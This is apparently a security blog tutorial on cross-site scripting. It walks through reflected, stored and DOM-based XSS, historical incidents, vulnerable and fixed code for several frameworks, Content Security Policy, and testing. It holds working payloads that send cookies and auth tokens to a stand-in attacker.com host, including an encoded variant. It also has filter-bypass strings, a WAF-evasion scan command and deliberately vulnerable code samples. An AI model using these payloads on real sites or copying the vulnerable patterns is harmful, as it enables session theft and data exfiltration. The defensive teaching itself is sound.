Cross-Site Scripting (XSS): Attack Types and Prevention
Key Takeaways
- •Before diving into mechanics: the impact of XSS execution depends entirely on what the application's JavaScript has access to.
- •In October 2005, Samy Kamkar exploited a stored XSS vulnerability in MySpace to create the fastest-spreading worm in internet history.
- •Reflected XSS is the simplest variant: the payload arrives in the HTTP request (URL parameter, form field, header), the server includes it in the HTML response without sanitization, and the browser executes it.
- •Stored (persistent) XSS is the high-severity variant.
- •DOM-based XSS is the most misunderstood variant.
- •Modern frameworks auto-escape output by default, but all of them have documented escape hatches.
Cross-site scripting is the most frequently found vulnerability in web applications. It consistently appears in bug bounty programs, penetration test reports, and OWASP's Top 10. Bug hunters have been paid millions in bounties for XSS bugs. Entire companies' session data, tokens, and user credentials have been stolen through persistent XSS payloads left in comment sections and forum posts.
The attack is conceptually simple — inject JavaScript that runs in another user's browser — but the exploitation techniques, bypass methods, and impact range from trivial to catastrophic depending on what the application does. A self-XSS in a profile field with no external visibility is a non-issue. A stored XSS in a feature visible to every admin and user, executing under their session, is a critical finding.
This post covers all three XSS variants in depth, real exploitation chains, filter bypass techniques, framework-specific escape hatches, and the complete defense stack.
Why XSS Is Dangerous
Before diving into mechanics: the impact of XSS execution depends entirely on what the application's JavaScript has access to.
What attacker-injected JavaScript can do:
- Read
document.cookieand exfiltrate session tokens (classic cookie theft) - Read
localStorageandsessionStorage— where modern SPAs store auth tokens - Make authenticated API requests on behalf of the victim (CSRF-bypass equivalent)
- Modify the DOM to inject fake login forms (credential harvesting)
- Log every keystroke the victim types (keylogger)
- Redirect the victim to a phishing page
- Take screenshots via canvas API
- Access the user's clipboard
- In high-privilege sessions: perform admin actions, create backdoor accounts, export all user data
Session cookies with HttpOnly flag can't be read by JavaScript — but localStorage tokens (JWTs, OAuth tokens) can be, and most modern SPAs store tokens in localStorage. HttpOnly cookies stop the most common XSS post-exploitation step but not all of them.
Real Incidents
Samy Worm (2005) — First XSS Worm in History
In October 2005, Samy Kamkar exploited a stored XSS vulnerability in MySpace to create the fastest-spreading worm in internet history. The payload:
- Added Samy as a friend of the infected user
- Displayed "but most of all, samy is my hero" on the infected user's profile
- Copied itself to the infected user's profile, infecting anyone who viewed it
Within 20 hours, Samy had over 1 million MySpace friend requests. MySpace was forced to take the entire site offline to remove the worm. Kamkar was prosecuted, placed on three years of probation, and paid $20,000 in restitution. MySpace's advertising revenue was impacted for days.
The technical limitation Kamkar had to work around: MySpace filtered javascript: and event handlers like onmouseover. His solution used CSS expression() (an IE-specific feature): <div style="background:url('javascript:void(eval(...))')">. He also used \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74 (hex encoding of "javascript") to bypass the filter.
British Airways (2018) — 500,000 Payment Cards
In September 2018, British Airways disclosed a breach affecting 500,000 customers who booked flights between August 21 and September 5, 2018. RiskIQ's researchers determined the attackers (Magecart Group 6) injected a 22-line JavaScript skimmer that captured form input from the BA payment page and exfiltrated it to baways.com (not the legitimate britishairways.com).
The skimmer ran in the browser during checkout and collected:
- Card number, expiry, CVV
- Name, billing address
- Email address
The attack was a supply chain XSS: attackers compromised a third-party JavaScript library loaded on BA's checkout page, injected their skimmer into that library, and it ran automatically on every transaction. BA was fined £20 million by the UK ICO (reduced from an initial £183 million figure). Total estimated theft: ~£14 million in fraudulent charges.
Twitter XSS (2014) — TweetDeck Worm
In June 2014, a self-propagating XSS worm spread across TweetDeck, Twitter's third-party client. A user discovered that TweetDeck was rendering tweet content as HTML and posted a tweet containing <script>alert()</script>. TweetDeck executed it. The worm evolved to automatically retweet itself and show pop-up alerts. Thousands of accounts were affected before TweetDeck was taken offline temporarily. No permanent data theft occurred in this case, but the attack demonstrated that a stored XSS in a widely-used client could spread virally.
Reflected XSS
Reflected XSS is the simplest variant: the payload arrives in the HTTP request (URL parameter, form field, header), the server includes it in the HTML response without sanitization, and the browser executes it. The attack is one-shot — it doesn't persist in the application.
Delivery mechanism: the attacker crafts a malicious URL and gets the victim to visit it. Methods include phishing emails, shortened URLs, social engineering, or open redirectors on the same domain.
Vulnerable Code
// Express.js — vulnerable search endpoint
app.get('/search', (req, res) => {
const query = req.query.q || '';
// VULNERABLE: user input directly in HTML response
res.send(`
<html>
<head><title>Search</title></head>
<body>
<h2>Results for: ${query}</h2>
<div id="results">Loading...</div>
</body>
</html>
`);
});Normal request: GET /search?q=laptops → renders "Results for: laptops"
Attack URL: https://target.com/search?q=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>
The <script> tag is inserted directly into the HTML. The browser parses and executes it. The victim's session cookie is sent to the attacker's server.
Delivery Without <script> Tags
Many applications filter or encode <script> tags but miss other vectors:
<!-- Event handlers on HTML elements -->
<img src=x onerror="fetch('https://attacker.com/?c='+btoa(document.cookie))">
<svg onload="eval(atob('ZmV0Y2goJ2h0dHBzOi8vYXR0YWNrZXIuY29tLz9jPScrYnRvYShkb2N1bWVudC5jb29raWUpKQ=='))">
<body onpageshow="new Image().src='https://attacker.com/?c='+document.cookie">
<input autofocus onfocus="alert(document.cookie)">
<details open ontoggle="alert(1)">
<!-- Attribute injection — breaks out of attribute context -->
"><script>alert(1)</script>
" onmouseover="alert(1)" x="
<!-- Href/src with javascript: URI -->
<a href="javascript:alert(document.cookie)">Click me</a>Filter Bypass Techniques
When a WAF or input filter blocks specific patterns, these bypass techniques frequently succeed:
<!-- Case variation -->
<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x ONERROR=alert(1)>
<!-- Tag breaking -->
<scr<script>ipt>alert(1)</scr</script>ipt>
<!-- HTML entity encoding (decoded by HTML parser before JS engine) -->
<img src=x onerror="alert(1)">
<!-- Double encoding -->
%253Cscript%253Ealert(1)%253C%252Fscript%253E
<!-- Null bytes (some parsers ignore them) -->
<scr\x00ipt>alert(1)</scr\x00ipt>
<!-- SVG vectors (different parser, often less filtered) -->
<svg><script>alert(1)</script></svg>
<svg><animate onbegin=alert(1)>
<svg><set onbegin=alert(1)>
<!-- Template literals for filter bypass -->
<img src=x onerror=`alert\`1\``>Fixed Code
// Option 1: Use a templating engine that auto-escapes
const ejs = require('ejs');
app.get('/search', (req, res) => {
const query = req.query.q || '';
// EJS auto-escapes <%= ... %> — use <%- ... %> only for trusted content
res.render('search', { query }); // search.ejs: <h2>Results for: <%= query %></h2>
});
// Option 2: Explicit HTML encoding before string insertion
const he = require('he');
app.get('/search', (req, res) => {
const query = he.encode(req.query.q || '', { useNamedReferences: true });
res.send(`<html><body><h2>Results for: ${query}</h2></body></html>`);
});Stored XSS
Stored (persistent) XSS is the high-severity variant. The payload is saved to a database and served to every user who views the affected content. No crafted URL required — any user who loads the page becomes a victim.
Common injection points:
- Comment sections and forums
- User profile fields (bio, display name, website URL)
- Product reviews and ratings
- Support ticket subject lines
- File names in upload features
- User-agent strings displayed in admin dashboards
- Error messages that include user-submitted data
The Impact Multiplier: Admin Panel Injection
The most valuable stored XSS target is any feature that surfaces user-submitted content in an admin dashboard. If a malicious payload in a support ticket description executes JavaScript in the admin's browser:
// Payload stored in support ticket subject: (injected by attacker as a "customer")
<img src=x onerror="
fetch('/admin/api/users', {credentials: 'include'})
.then(r => r.json())
.then(data => {
fetch('https://attacker.com/exfil', {
method: 'POST',
body: JSON.stringify({
users: data,
adminCookie: document.cookie,
adminToken: localStorage.getItem('auth_token')
})
});
});
">When an admin opens the ticket, the payload:
- Calls the admin API with the admin's session credentials
- Gets the full user list
- Exfiltrates it along with the admin's auth token to the attacker's server
The attacker now has the admin's token and the entire user database.
Vulnerable Code
# Flask — vulnerable comment system
from flask import Flask, request, Markup, render_template_string
app = Flask(__name__)
@app.route('/comment', methods=['POST'])
def post_comment():
content = request.form['content']
db.execute("INSERT INTO comments (content, created_at) VALUES (?, ?)",
(content, datetime.now()))
return redirect('/posts/1')
@app.route('/posts/1')
def view_post():
comments = db.execute("SELECT content, created_at FROM comments").fetchall()
# VULNERABLE: Markup() tells Jinja2 "trust this HTML, don't escape it"
rendered = [{'text': Markup(c['content']), 'date': c['created_at']} for c in comments]
return render_template('post.html', comments=rendered)<!-- post.html — Jinja2 template -->
{% for comment in comments %}
<div class="comment">
{{ comment.text }} <!-- safe because Markup() was applied, but WRONG for user content -->
</div>
{% endfor %}Fixed Code
# SAFE: pass raw strings, let Jinja2 auto-escape them
@app.route('/posts/1')
def view_post():
comments = db.execute("SELECT content, created_at FROM comments").fetchall()
# Pass dict with raw string — never wrap in Markup()
return render_template('post.html', comments=[
{'text': c['content'], 'date': c['created_at']} for c in comments
])<!-- post.html — correct usage -->
{% for comment in comments %}
<div class="comment">
{{ comment.text }} <!-- Jinja2 auto-escapes: < becomes <, > becomes > -->
<!-- NEVER: {{ comment.text | safe }} — this disables escaping -->
</div>
{% endfor %}When You Must Accept HTML: Sanitization
Rich text editors (Quill, TipTap, CKEditor) produce HTML that needs to be stored and rendered. You can't escape it — but you must sanitize it.
import bleach
ALLOWED_TAGS = ['p', 'br', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li',
'h1', 'h2', 'h3', 'blockquote', 'code', 'pre']
ALLOWED_ATTRIBUTES = {
'a': ['href', 'title'],
'*': ['class'], # Allow class for styling but no event handlers
}
def sanitize_rich_text(html: str) -> str:
# bleach strips all tags not in ALLOWED_TAGS
# and all attributes not in ALLOWED_ATTRIBUTES
# strip=True removes disallowed tags entirely (vs. escaping them)
clean = bleach.clean(
html,
tags=ALLOWED_TAGS,
attributes=ALLOWED_ATTRIBUTES,
strip=True,
strip_comments=True
)
# Additionally, sanitize href values to prevent javascript: URIs
clean = bleach.linkify(clean, callbacks=[
lambda attrs, new: attrs if not attrs.get((None, 'href'), '').startswith('javascript:') else None
])
return clean// DOMPurify for JavaScript (client-side or Node.js with jsdom)
import DOMPurify from 'dompurify';
const sanitizeConfig = {
ALLOWED_TAGS: ['p', 'br', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li',
'h1', 'h2', 'h3', 'blockquote', 'code', 'pre'],
ALLOWED_ATTR: ['href', 'title', 'class'],
ALLOW_DATA_ATTR: false,
FORBID_SCRIPTS: true,
FORCE_BODY: false,
};
function sanitizeContent(dirty: string): string {
return DOMPurify.sanitize(dirty, sanitizeConfig);
}Sanitize on write, not on read. Store sanitized content in the database. If you only sanitize on read, a bug in your sanitization logic — or a sanitization library update — can affect historical content inconsistently. Write-time sanitization with a strict allowlist is the correct approach.
DOM-Based XSS
DOM-based XSS is the most misunderstood variant. The vulnerability exists entirely in client-side JavaScript — the server never sees the malicious payload. The attack flows from a source (attacker-controlled data enters the JavaScript environment) to a sink (data is interpreted as code or HTML).
The server's logs are clean. No server-side sanitization can help. The vulnerability must be fixed in the frontend JavaScript code.
Sources (Where Attacker Data Enters)
// Common DOM XSS sources
location.href // full URL
location.search // query string (?key=value)
location.hash // fragment (#value)
location.pathname // URL path
document.referrer // referrer header
document.URL // alias for location.href
window.name // persists across navigations
document.cookie // if set without HttpOnly (not useful for attacker-controlled data)
// postMessage — frequently overlooked
window.addEventListener('message', (event) => {
// VULNERABLE: if event.data is used in a dangerous sink without validation
document.getElementById('output').innerHTML = event.data;
});Sinks (Where Code Executes)
// DANGEROUS sinks — avoid with user-controlled data
element.innerHTML = value; // parses as HTML, executes scripts
element.outerHTML = value; // same
document.write(value); // same
document.writeln(value); // same
element.insertAdjacentHTML('beforeend', value);
eval(value); // executes as JavaScript
setTimeout(value, 0); // if value is a string, executed as JS
setInterval(value, 0); // same
new Function(value)(); // same
location.href = value; // javascript: URI injection
location.assign(value); // same
location.replace(value); // same
element.src = value; // javascript: URI injection in certain contexts
// SAFE alternatives
element.textContent = value; // text only, no HTML parsing
element.setAttribute('data-x', value); // attribute value, not HTMLClassic DOM XSS Example
<!-- Vulnerable page: reads URL hash to display a welcome message -->
<!DOCTYPE html>
<html>
<body>
<div id="greeting"></div>
<script>
// VULNERABLE: reads from location.hash (source) and writes to innerHTML (sink)
const name = decodeURIComponent(location.hash.slice(1));
document.getElementById('greeting').innerHTML = 'Hello, ' + name + '!';
</script>
</body>
</html>Attack URL: https://target.com/welcome#<img src=x onerror=alert(document.cookie)>
The server returns a completely normal response. In the browser:
- JavaScript reads
location.hash→#<img src=x onerror=alert(document.cookie)> .slice(1)removes the#decodeURIComponentdecodes the URL encodinginnerHTMLreceives the<img>tag and creates a DOM elementsrc=xfails to load, triggeringonerroralert(document.cookie)executes
The server log shows a completely normal GET request with no suspicious query parameters.
Fix
// SAFE: textContent treats value as literal text, no HTML parsing
const name = decodeURIComponent(location.hash.slice(1));
document.getElementById('greeting').textContent = 'Hello, ' + name + '!';postMessage DOM XSS
// Vulnerable page receiving postMessage
window.addEventListener('message', function(event) {
// VULNERABLE: no origin validation, innerHTML sink
if (event.data.type === 'updateContent') {
document.getElementById('content').innerHTML = event.data.html;
}
});
// Attack: from an iframe or popup on a different domain
window.opener.postMessage({ type: 'updateContent', html: '<img src=x onerror=alert(1)>' }, '*');// SAFE: validate origin, avoid dangerous sinks
const TRUSTED_ORIGINS = ['https://app.example.com', 'https://widget.example.com'];
window.addEventListener('message', function(event) {
// Validate message origin
if (!TRUSTED_ORIGINS.includes(event.origin)) {
console.warn('Rejected message from untrusted origin:', event.origin);
return;
}
if (event.data.type === 'updateContent') {
// Use textContent if only text is needed
document.getElementById('content').textContent = event.data.text;
// Or sanitize if HTML is required
const clean = DOMPurify.sanitize(event.data.html);
document.getElementById('content').innerHTML = clean;
}
});DOM XSS in URL Routing (React)
// Vulnerable React component — reads URL param and uses dangerouslySetInnerHTML
import { useSearchParams } from 'react-router-dom';
function SearchPage() {
const [params] = useSearchParams();
const query = params.get('q') || '';
return (
<div>
{/* VULNERABLE: dangerouslySetInnerHTML with user input */}
<h2 dangerouslySetInnerHTML={{ __html: `Search results for: ${query}` }} />
</div>
);
}// SAFE: React's default JSX rendering escapes automatically
function SearchPage() {
const [params] = useSearchParams();
const query = params.get('q') || '';
return (
<div>
{/* SAFE: React escapes query automatically */}
<h2>Search results for: {query}</h2>
</div>
);
}Framework Escape Hatches
Modern frameworks auto-escape output by default, but all of them have documented escape hatches. These are responsible for a significant portion of XSS findings in "modern" applications.
React
// SAFE by default — React escapes all JSX expressions
function UserProfile({ bio }) {
return <p>{bio}</p>; // bio is text, not HTML — cannot contain executable scripts
}
// VULNERABLE: dangerouslySetInnerHTML
function UserBio({ bio }) {
// If bio came from user input and isn't sanitized, this is stored XSS
return <div dangerouslySetInnerHTML={{ __html: bio }} />;
}
// SAFE: sanitize before setting innerHTML
import DOMPurify from 'dompurify';
function UserBio({ bio }) {
const safeBio = DOMPurify.sanitize(bio, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
ALLOWED_ATTR: ['href'],
});
return <div dangerouslySetInnerHTML={{ __html: safeBio }} />;
}
// DANGEROUS: href with user-controlled value
function UserLink({ url, text }) {
// VULNERABLE if url can be "javascript:alert(1)"
return <a href={url}>{text}</a>;
}
// SAFE: validate URL protocol
function UserLink({ url, text }) {
const safeUrl = /^https?:\/\//i.test(url) ? url : '#';
return <a href={safeUrl} rel="noopener noreferrer">{text}</a>;
}Vue.js
<!-- SAFE by default — Vue escapes interpolated values -->
<template>
<p>{{ userBio }}</p> <!-- escaped, safe -->
</template>
<!-- VULNERABLE: v-html directive -->
<template>
<div v-html="userBio"></div> <!-- NOT escaped — renders as HTML -->
</template>
<!-- SAFE: sanitize before v-html -->
<template>
<div v-html="sanitizedBio"></div>
</template>
<script>
import DOMPurify from 'dompurify';
export default {
computed: {
sanitizedBio() {
return DOMPurify.sanitize(this.userBio);
}
}
}
</script>Angular
// Angular's default [innerHTML] binding applies DomSanitizer automatically
// But bypassSecurityTrust* methods disable this
// SAFE: Angular's default binding
@Component({
template: `<div [innerHTML]="userBio"></div>` // Angular sanitizes automatically
})
// VULNERABLE: bypass methods
import { DomSanitizer } from '@angular/platform-browser';
@Component({
template: `<div [innerHTML]="trustedHtml"></div>`
})
export class CommentComponent {
trustedHtml: SafeHtml;
constructor(private sanitizer: DomSanitizer, private userService: UserService) {
// VULNERABLE: tells Angular "I trust this, skip sanitization"
this.trustedHtml = this.sanitizer.bypassSecurityTrustHtml(userService.getBio());
}
}
// SAFE: use Angular's sanitize() method instead of bypass
@Component({
template: `<div [innerHTML]="safeHtml"></div>`
})
export class CommentComponent {
safeHtml: string;
constructor(private sanitizer: DomSanitizer) {
// sanitize() applies sanitization and returns a SafeHtml value
this.safeHtml = this.sanitizer.sanitize(SecurityContext.HTML, userBio) ?? '';
}
}Next.js (Server-Side and Client-Side)
// Next.js server component — vulnerable
export default async function Page({ params }) {
const data = await fetchData(params.id);
// VULNERABLE: dangerouslySetInnerHTML with unescaped server data
return (
<article dangerouslySetInnerHTML={{ __html: data.content }} />
);
}
// SAFE: sanitize on the server before rendering
import { sanitize } from 'isomorphic-dompurify';
export default async function Page({ params }) {
const data = await fetchData(params.id);
const safeContent = sanitize(data.content, {
ALLOWED_TAGS: ['p', 'h2', 'h3', 'ul', 'ol', 'li', 'a', 'strong', 'em', 'code', 'pre'],
ALLOWED_ATTR: ['href', 'class'],
});
return <article dangerouslySetInnerHTML={{ __html: safeContent }} />;
}Content Security Policy
CSP is the browser-enforced defense layer that blocks script execution even when encoding fails. A properly configured CSP with nonces makes XSS exploitation dramatically harder — injected script tags without the correct nonce will be blocked by the browser.
Nonce-Based CSP
// Next.js middleware — generate nonce per request
import { NextResponse } from 'next/server';
import type { NextRequest } from 'next/server';
import { randomBytes } from 'crypto';
export function middleware(request: NextRequest) {
const nonce = randomBytes(16).toString('base64');
const csp = [
`default-src 'self'`,
`script-src 'self' 'nonce-${nonce}'`, // only scripts with this nonce execute
`style-src 'self' 'nonce-${nonce}'`,
`img-src 'self' data: https:`,
`font-src 'self'`,
`connect-src 'self' https://api.example.com`,
`object-src 'none'`, // no Flash, no plugins
`base-uri 'self'`, // prevents base tag injection
`frame-ancestors 'none'`, // prevents clickjacking
`upgrade-insecure-requests`,
].join('; ');
const response = NextResponse.next({
request: { headers: new Headers({ ...Object.fromEntries(request.headers), 'x-nonce': nonce }) },
});
response.headers.set('Content-Security-Policy', csp);
return response;
}// Next.js root layout — use nonce in script tags
import { headers } from 'next/headers';
export default function RootLayout({ children }) {
const nonce = headers().get('x-nonce') || '';
return (
<html>
<head>
{/* This script tag includes the nonce — browser allows it */}
<script nonce={nonce} src="/analytics.js"></script>
</head>
<body>{children}</body>
</html>
);
}Without the nonce, an injected <script>alert(1)</script> is blocked even if it somehow makes it into the page.
Testing Your CSP
# Check what CSP is deployed
curl -I https://target.com | grep -i content-security-policy
# Evaluate CSP strength
# Use Google's CSP Evaluator
curl -s "https://csp-evaluator.withgoogle.com/getCSP?url=https://target.com" | jq .
# Common CSP weaknesses that allow bypass:
# - 'unsafe-inline' in script-src
# - 'unsafe-eval' in script-src
# - Wildcard in script-src: *
# - Specific CDN domains that host user-uploaded files: *.cloudinary.com
# - script-src missing, falling back to default-srcA CSP with 'unsafe-inline' provides essentially zero protection against XSS. 'unsafe-eval' is nearly as bad. A common mistake is setting default-src 'self' 'unsafe-inline' — the 'unsafe-inline' in default-src applies to scripts, completely negating the protection. Treat any CSP containing these directives as if no CSP exists.
Detection: Finding XSS in Code and in Black-Box Testing
Code Review Checklist
# Python/Jinja2 red flags
{{ variable | safe }} # disables escaping
Markup(user_controlled_value) # marks as trusted HTML
render_template_string(f"... {user_input} ...") # SSTI and XSS combined risk// JavaScript red flags
element.innerHTML = value; // direct HTML injection
element.outerHTML = value;
document.write(value);
element.insertAdjacentHTML('afterbegin', value);
eval(userInput);
setTimeout(userInput, 0); // string arg to setTimeout
new Function(userInput)();
location.href = 'javascript:' + value;// React red flags
dangerouslySetInnerHTML={{ __html: unverifiedData }}
<a href={userProvidedUrl}> // javascript: URI risk
<img src={userProvidedUrl}> // javascript: URI risk// Angular red flags
bypassSecurityTrustHtml(userInput)
bypassSecurityTrustScript(userInput)
bypassSecurityTrustUrl(userInput)
bypassSecurityTrustResourceUrl(userInput)Black-Box Testing
# Step 1: Find reflection points
# Inject a unique string and look for it in the response
curl -s "https://target.com/search?q=PWNSY_TEST" | grep PWNSY_TEST
# Step 2: Test for HTML context injection
curl -s "https://target.com/search?q=<b>PWNSY</b>" | grep -i '<b>PWNSY</b>'
# If you see the literal <b>PWNSY</b> unencoded, HTML injection is possible
# Step 3: Test for script execution
curl -s 'https://target.com/search?q=<script>alert(1)</script>' | grep -i 'script'
# Step 4: Use dalfox for automated XSS discovery
dalfox url "https://target.com/search?q=FUZZ" --waf-evasion --follow-redirects
# Step 5: Burp Suite DOM Invader
# Install DOM Invader canary into browser through Burp Suite
# Navigates the application and automatically detects DOM XSS sources/sinksXSS Hunter for Out-of-Band Detection
Some XSS payloads execute in contexts where you can't see the output (admin panels, email notifications, PDF renderers):
// XSSHunter payload — executes, sends report to your endpoint
'"><script src=https://yourdomain.xss.ht></script>XSSHunter captures:
- The full page HTML when the payload fired
- Screenshot of the page
- The URL the payload fired on
- The browser's cookies
- The authenticated user's identity
Use xsshunter.com (hosted) or self-host the open source version.
Defense Stack Summary
| Defense | What It Prevents | How to Implement |
|---|---|---|
| Output encoding | Reflected and stored XSS at render time | Use framework defaults; never use | safe or dangerouslySetInnerHTML on user data |
| textContent over innerHTML | DOM XSS at sink | Audit every innerHTML assignment |
| Input sanitization | Stored XSS when HTML is required | DOMPurify, bleach, OWASP Java HTML Sanitizer |
| CSP with nonces | Execution of injected scripts | Strict CSP header, regenerate nonce per request |
| HttpOnly cookies | Session token theft via document.cookie | Set cookie flags: HttpOnly; Secure; SameSite=Strict |
| URL scheme validation | javascript: URI injection | Validate href/src values to only allow https: |
| postMessage origin validation | Cross-origin DOM XSS | Always validate event.origin |
The defense hierarchy in priority order:
- Output encoding — context-aware escaping at every insertion point eliminates reflected and stored XSS at the rendering layer
- Avoid dangerous sinks —
textContentinstead ofinnerHTML, noeval(), nodangerouslySetInnerHTMLon user data - Input sanitization on write — for rich text, sanitize with a strict allowlist before storage
- Content Security Policy — nonce-based CSP adds browser enforcement that catches encoding failures
- HttpOnly + SameSite cookies — limits post-exploitation impact even when XSS executes
Output encoding is table stakes. Every framework does it by default. Every XSS vulnerability in a modern framework application exists because a developer explicitly bypassed those defaults. If you find dangerouslySetInnerHTML, | safe, bypassSecurityTrust*, or innerHTML = on user-controlled data in a code review, you have a finding.